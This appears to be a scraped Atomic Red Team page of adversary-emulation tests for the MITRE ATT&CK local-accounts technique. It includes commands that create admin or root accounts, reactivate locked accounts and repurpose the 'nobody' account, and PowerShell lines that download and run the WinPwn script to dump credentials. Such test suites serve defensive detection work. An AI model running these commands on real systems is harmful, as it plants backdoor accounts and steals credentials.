Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement.
Atomic Test #2 - Create local account with admin privileges - MacOS
Atomic Test #3 - Create local account with admin privileges using sysadminctl utility - MacOS
Atomic Test #4 - Enable root account using dsenableroot utility - MacOS
Atomic Test #5 - Add a new/existing user to the admin group using dseditgroup utility - macOS
Atomic Test #6 - WinPwn - Loot local Credentials - powerhell kittie
Atomic Test #7 - WinPwn - Loot local Credentials - Safetykatz
Atomic Test #9 - Reactivate a locked/expired account (Linux)
Atomic Test #10 - Reactivate a locked/expired account (FreeBSD)
Atomic Test #13 - Use PsExec to elevate to NT Authority\SYSTEM account
After execution the new account will be active and added to the Administrators group
Supported Platforms: Windows
auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15
| Name | Description | Type | Default Value | |——|————-|——|—————| | password | Password for art-test user | string | -4RTisCool!-321|
1
command_prompt
! Elevation Required (e.g. root or admin)net user art-test /add
net user art-test #{password}
net localgroup administrators art-test /add
net localgroup administrators art-test /delete >nul 2>&1
net user art-test /delete >nul 2>&1
After execution the new account will be active and added to the Administrators group
Supported Platforms: macOS
auto_generated_guid: f1275566-1c26-4b66-83e3-7f9f7f964daa
1
bash
! Elevation Required (e.g. root or admin)
1
2
3
4
5
6
7
8
dscl . -create /Users/AtomicUser
dscl . -create /Users/AtomicUser UserShell /bin/bash
dscl . -create /Users/AtomicUser RealName "Atomic User"
dscl . -create /Users/AtomicUser UniqueID 503
dscl . -create /Users/AtomicUser PrimaryGroupID 503
dscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser
dscl . -passwd /Users/AtomicUser mySecretPassword
dscl . -append /Groups/admin GroupMembership AtomicUser
1
sudo dscl . -delete /Users/AtomicUser
After execution the new account will be active and added to the Administrators group
Supported Platforms: macOS
auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
1
bash
! Elevation Required (e.g. root or admin)
1
sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin
1
sysadminctl interactive -deleteUser art-tester
After execution the current/new user will have root access
Supported Platforms: macOS
auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
1
bash
! Elevation Required (e.g. root or admin)
1
2
dsenableroot #current user
dsenableroot -u art-tester -p art-tester -r art-root #new user
1
2
dsenableroot -d #current user
dsenableroot -d -u art-tester -p art-tester #new user
After execution the current/new user will be added to the Admin group
Supported Platforms: macOS
auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
1
bash
! Elevation Required (e.g. root or admin)
1
dseditgroup -o edit -a art-user -t user admin
1
dseditgroup -o edit -d art-user -t user admin
Loot local Credentials - powerhell kittie technique via function of WinPwn
Supported Platforms: Windows
auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
1
powershell
! Elevation Required (e.g. root or admin)
1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive
Loot local Credentials - Safetykatz technique via function of WinPwn
Supported Platforms: Windows
auto_generated_guid: e9fdb899-a980-4ba4-934b-486ad22e22f4
1
powershell
! Elevation Required (e.g. root or admin)
1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive
An adversary may wish to create an account with admin privileges to work with. In this test we create a “art” user with the password art, switch to art, execute whoami, exit and delete the art user.
Supported Platforms: Linux
auto_generated_guid: 02a91c34-8a5b-4bed-87af-501103eb5357
1
bash
! Elevation Required (e.g. root or admin)
1
2
3
password=$(openssl passwd -1 art)
([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
su art -c "whoami; exit"
1
[ "$(uname)" = 'Linux' ] && userdel art -rf || rmuser -y art
A system administrator may have locked and expired a user account rather than deleting it. “the user is coming back, at some stage” An adversary may reactivate a inactive account in an attempt to appear legitimate.
In this test we create a “art” user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
Supported Platforms: Linux
auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931
1
bash
! Elevation Required (e.g. root or admin)
1
2
3
4
5
6
useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
usermod --lock art
usermod --expiredate "1" art
usermod --unlock art
usermod --expiredate "99999" art
su -c whoami art
1
userdel -r art
A system administrator may have locked and expired a user account rather than deleting it. “the user is coming back, at some stage” An adversary may reactivate a inactive account in an attempt to appear legitimate.
In this test we create a “art” user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
Supported Platforms: Linux
auto_generated_guid: 09e3380a-fae5-4255-8b19-9950be0252cf
1
sh
! Elevation Required (e.g. root or admin)
1
2
3
4
5
6
7
8
9
pw useradd art -g wheel -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
pw lock art
pw usermod art -e +1d
pw unlock art
pw user mod art -e +99d
su art
whoami
exit
1
rmuser -y art
An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody’s shell to /usr/sbin/nologin. Here is how the nobody entry should look like in
before the test is executed and right after the cleanup:
1
/etc/passwd
1
# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
Supported Platforms: Linux
auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85
1
bash
! Elevation Required (e.g. root or admin)
1
2
3
4
cat /etc/passwd |grep nobody
chsh --shell /bin/bash nobody
usermod --password $(openssl passwd -1 nobody) nobody
su -c "whoami" nobody
1
2
3
chsh --shell /usr/sbin/nologin nobody
cat /etc/passwd |grep nobody
# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody’s shell to /usr/sbin/nologin. Here is how the nobody entry should look like in
before the test is executed and right after the cleanup:
1
/etc/passwd
1
# -> nobody:x:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
Supported Platforms: Linux
auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310
1
sh
! Elevation Required (e.g. root or admin)
1
2
3
4
5
6
cat /etc/passwd |grep nobody
pw usermod nobody -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user nobody -h 0
su nobody
whoami
exit
1
2
3
pw usermod nobody -s /usr/sbin/nologin
cat /etc/passwd |grep nobody
# -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
PsExec is a powerful tool most known for its remote management capability. However, it can also be used to run processes as the local system account.
The local system account is a default windows account which has unrestricted access to all system resources.
Upon successful execution, PsExec.exe will spawn a command prompt which will run ‘whoami’ as the local system account and then exit.
Supported Platforms: Windows
auto_generated_guid: 6904235f-0f55-4039-8aed-41c300ff7733
1
command_prompt
! Elevation Required (e.g. root or admin)"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -accepteula -s %COMSPEC% /c whoami
1
powershell
!
1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") { exit 0 } else { exit 1 }
1
2
3
4
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PsTools" -Force
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force